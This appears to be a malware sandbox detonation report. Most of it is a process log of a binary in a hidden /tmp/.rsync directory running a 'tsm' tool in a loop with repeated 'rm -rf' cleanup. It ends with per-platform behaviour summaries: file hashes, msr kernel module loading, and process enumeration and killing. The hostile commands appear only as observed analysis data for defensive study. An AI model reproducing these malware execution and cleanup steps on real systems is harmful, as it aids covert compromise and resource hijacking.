[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/64/libc.so.6
[/tmp/.rsync/c/lib/64/libc.so.6]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240611-en
Max time kernel
11s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libdl.so.2
[/tmp/.rsync/c/lib/32/libdl.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | /lib/modules/4.15.0-213-generic/kernel/arch/x86/kernel/msr.ko | /sbin/modprobe | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
| File opened for reading | /sys/module/msr/initstate | /sbin/modprobe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1504/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/34/status | /bin/ps | N/A |
| File opened for reading | /proc/581/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1169/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/460/status | /bin/ps | N/A |
| File opened for reading | /proc/547/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/581/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/84/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/972/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/581/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/962/status | /bin/ps | N/A |
| File opened for reading | /proc/962/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/972/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/177/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/517/stat | /bin/ps | N/A |
| File opened for reading | /proc/1142/stat | /bin/ps | N/A |
| File opened for reading | /proc/1502/stat | /bin/ps | N/A |
| File opened for reading | /proc/1073/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/status | /bin/ps | N/A |
| File opened for reading | /proc/1301/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/170/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1084/stat | /bin/ps | N/A |
| File opened for reading | /proc/250/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/280/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1291/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/1318/stat | /bin/ps | N/A |
| File opened for reading | /proc/446/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1197/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/172/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/475/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/1197/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1060/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1343/stat | /bin/ps | N/A |
| File opened for reading | /proc/1379/status | /bin/ps | N/A |
| File opened for reading | /proc/323/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1192/status | /bin/ps | N/A |
| File opened for reading | /proc/215/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1169/status | /bin/ps | N/A |
| File opened for reading | /proc/11/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/185/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/85/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1146/stat | /bin/ps | N/A |
